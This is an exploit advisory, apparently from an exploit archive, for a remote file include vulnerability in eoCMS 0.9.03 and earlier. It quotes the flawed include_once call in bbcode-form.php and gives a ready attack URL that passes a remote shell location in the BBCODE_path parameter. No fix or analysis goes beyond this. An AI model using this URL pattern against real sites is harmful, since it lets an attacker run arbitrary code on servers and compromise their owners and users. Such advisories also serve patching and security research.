eoCMS <= 0.9.03 Remote FIle Include Vulnerability

=================================================
eoCMS <= 0.9.03 Remote FIle Include Vulnerability
=================================================

# Exploit Title: eoCMS <= 0.9.03 Remote FIle Include Vulnerability
# Date: 14-12-2009
# Author: 1nd0n3s14n l4m3r
# Software Link: http://eocms.com/index.php?act=plugin&id=4
# Version: N/A
# Tested on: GNU/LINUX
# CVE : N/A
# Code : N/A
#####################################################################
 
 
##########################################################################
##          eoCMS <= 0.9.03 Remote FIle Include Vulnerability           ##
##                  Created By 1nd0n3s14n l4m3r                         ##
##                      (c) -- 14/12/2oo9                               ##
##########################################################################
 
#####################################################################################
##  ~ Infected File : [bbcode-form.php]                                            ##
##                                                                                 ##
##    include_once($BBCODE_path . 'bbcodepress/bbcodepress-lite.php');             ##
##    $textarea_name = 'dataBox';                                                  ##
##    $smiley_image_path = './images/emoticons/';                                  ##
##    $bbcode_image_path = './themes/' . $settings['site_theme'] . '/images/';     ##
##                                                                                 ##
##    if(!$BBCODE_override){                                                       ##
##        $head .= '<script language=JavaScript src=bbcodepress-lite.js></script>';##
##        $BBCODE_override = getStandard('./js/bbcodepress/');                     ##
##    //        $BBCODE_override = getStandard('./js/bbcodepress/','-eocms');      ##
##     }                                                                           ##
##                                                                                 ##
##  ~ Example :                                                                    ##
##                                                                                 ##
##    [path]/js/bbcodepress/bbcode-form.php?BBCODE_path=[Shell]                    ##
##                                                                                 ##
##                                                                                 ##
#####################################################################################



#  0day.today [2018-04-12]  #